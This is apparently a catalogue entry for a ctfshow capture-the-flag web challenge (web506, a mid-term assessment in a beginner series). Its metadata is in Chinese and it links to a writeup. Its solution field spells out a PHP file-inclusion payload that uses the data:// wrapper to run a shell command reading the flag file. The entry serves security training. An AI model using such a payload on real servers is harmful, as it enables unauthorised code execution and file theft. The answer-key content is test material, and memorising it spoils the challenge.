web506
| ID: | 3920 |
|---|---|
| 标题: | web506 |
| 描述: | * 此题为 【从0开始学web】系列第五百零六题 * 此系列题目从最基础开始,题目遵循循序渐进的原则 * 下面开始综合测评了,快来检验下前面的学习成果吧~ **此题1分,做完这个题就128分啦!恭喜师傅,满分150分** |
| 类型: | WEB入门.中期测评 |
| 网站: | ctfshow |
| 题目链接: | https://ctf.show/api/v1/challenges/1124 |
| 赛事: | 中期测评 |
| 年度: | None |
| Flag值: | web506的解题答案为利用data://伪协议触发文件包含漏洞,构造payload debug=1&f=data://text/plain,user<?php system('cat /f*');?> 读取flag文件。验证网址为直接指向解题过程的博客文章: https://waynejoons.icu/posts/ctfshow-mid-term-assessment-2-web502-web516/ |
| writeup: | https://waynejoons.icu/posts/ctfshow-mid-term-assessment-2-web502-web516/ |